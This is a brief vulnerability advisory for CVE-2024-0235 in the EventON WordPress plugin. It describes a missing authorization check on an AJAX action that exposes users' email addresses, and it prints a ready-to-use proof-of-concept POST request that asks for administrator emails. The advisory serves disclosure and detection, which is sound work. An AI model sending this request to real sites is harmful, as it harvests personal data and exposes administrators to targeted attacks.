The EventON WordPress plugin before 4.5.5, EventON WordPress plugin before 2.2.7 do not have authorization in an AJAX action, allowing unauthenticated users to retrieve email addresses of any users on the blog.
The following HTTP request demonstrates how to retrieve email addresses:
POST /wp-admin/admin-ajax.php?action=eventon_get_virtual_users HTTP/1.1
Host: <target-site>
Content-Type: application/x-www-form-urlencoded
_user_role=administrator
View the template here CVE-2024-0235.yaml
References:
https://wpscan.com/vulnerability/e370b99a-f485-42bd-96a3-60432a15a4e9/